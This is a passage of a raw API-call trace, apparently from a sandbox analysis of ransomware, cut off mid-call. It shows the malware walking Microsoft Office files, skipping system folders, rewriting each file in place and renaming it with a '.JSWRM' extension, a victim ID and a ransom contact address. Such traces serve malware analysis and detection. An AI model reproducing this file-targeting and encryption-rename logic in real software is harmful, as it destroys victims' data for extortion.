[0101.689] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd356d87a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd356d87a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd36c4db5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x19870, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.officemui.msi.16.en-us.xml", cAlternateFileName="C29059~1.XML")) returned 1 [0101.689] lstrcmpiW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2=".") returned 1 [0101.689] lstrcmpiW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="..") returned 1 [0101.689] lstrcmpiW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="...") returned 1 [0101.689] lstrcmpiW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="windows") returned -1 [0101.689] lstrcmpiW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="recovery") returned -1 [0101.689] lstrcmpiW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0101.689] lstrcmpiW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0101.689] lstrcmpiW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.689] lstrcmpiW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0101.689] lstrcmpiW (lpString1="C2RManifest.officemui.msi.16.en-us.xml", lpString2="msocache") returned -1 [0101.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0101.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.officemui.msi.16.en-us.xml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0101.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.officemui.msi.16.en-us.xml", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.officemui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 38 [0101.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0101.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0101.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.officemui.msi.16.en-us.xml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0101.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.officemui.msi.16.en-us.xml", cchWideChar=38, lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.officemui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 38 [0101.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0101.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0101.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0101.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0101.738] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.officemui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.officemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.743] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=104560) returned 1 [0101.744] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19870) returned 0x24d210 [0101.744] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x19870, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x19870, lpOverlapped=0x0) returned 1 [0101.757] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.757] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x19870, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x19870, lpOverlapped=0x0) returned 1 [0101.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.757] CloseHandle (hObject=0x45c) returned 1 [0101.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0101.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0101.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0101.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0101.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0101.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0101.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0101.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0101.758] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.officemui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.officemui.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.officemui.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.officemui.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0101.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0101.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0101.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.759] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd375d6d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd375d6d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd38424c0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.officemuiset.msi.16.en-us.xml", cAlternateFileName="C2467F~1.XML")) returned 1 [0101.759] lstrcmpiW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2=".") returned 1 [0101.759] lstrcmpiW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="..") returned 1 [0101.759] lstrcmpiW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="...") returned 1 [0101.759] lstrcmpiW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="windows") returned -1 [0101.759] lstrcmpiW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="recovery") returned -1 [0101.759] lstrcmpiW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0101.759] lstrcmpiW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0101.760] lstrcmpiW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.760] lstrcmpiW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0101.760] lstrcmpiW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="msocache") returned -1 [0101.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0101.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.officemuiset.msi.16.en-us.xml", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0101.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.officemuiset.msi.16.en-us.xml", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.officemuiset.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 41 [0101.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0101.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0101.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.officemuiset.msi.16.en-us.xml", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0101.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.officemuiset.msi.16.en-us.xml", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.officemuiset.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 41 [0101.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0101.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0101.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0101.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0101.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.officemuiset.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.officemuiset.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.762] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=2042) returned 1 [0101.762] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7f0) returned 0x20c6c0 [0101.762] ReadFile (in: hFile=0x45c, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7f0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345ec04*=0x7f0, lpOverlapped=0x0) returned 1 [0101.763] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.764] WriteFile (in: hFile=0x45c, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345ec00*=0x7f0, lpOverlapped=0x0) returned 1 [0101.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0101.764] CloseHandle (hObject=0x45c) returned 1 [0101.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0101.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0101.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0101.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0101.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0101.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0101.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0101.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0101.764] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.officemuiset.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.officemuiset.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.officemuiset.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.officemuiset.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0101.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0101.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0101.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.765] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd276bb03, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd276bb03, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd295b9b9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x17b3c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", cAlternateFileName="C21839~1.XML")) returned 1 [0101.765] lstrcmpiW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2=".") returned 1 [0101.765] lstrcmpiW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="..") returned 1 [0101.765] lstrcmpiW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="...") returned 1 [0101.765] lstrcmpiW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="windows") returned -1 [0101.765] lstrcmpiW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="recovery") returned -1 [0101.765] lstrcmpiW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="perflogs") returned -1 [0101.766] lstrcmpiW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="documents and settings") returned -1 [0101.766] lstrcmpiW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.766] lstrcmpiW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="system volume information") returned -1 [0101.766] lstrcmpiW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="msocache") returned -1 [0101.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0101.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0101.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0101.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", cchWideChar=52, lpMultiByteStr=0x20d728, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 52 [0101.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0101.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0101.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0101.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", cchWideChar=52, lpMultiByteStr=0x20dde8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 52 [0101.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0101.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0101.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0101.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0101.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.767] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=97084) returned 1 [0101.767] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17b30) returned 0x24d210 [0101.767] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x17b30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x17b30, lpOverlapped=0x0) returned 1 [0101.779] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.779] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x17b30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x17b30, lpOverlapped=0x0) returned 1 [0101.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.779] CloseHandle (hObject=0x45c) returned 1 [0101.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0101.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0101.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0101.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0101.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0101.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0101.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.780] MoveFileW 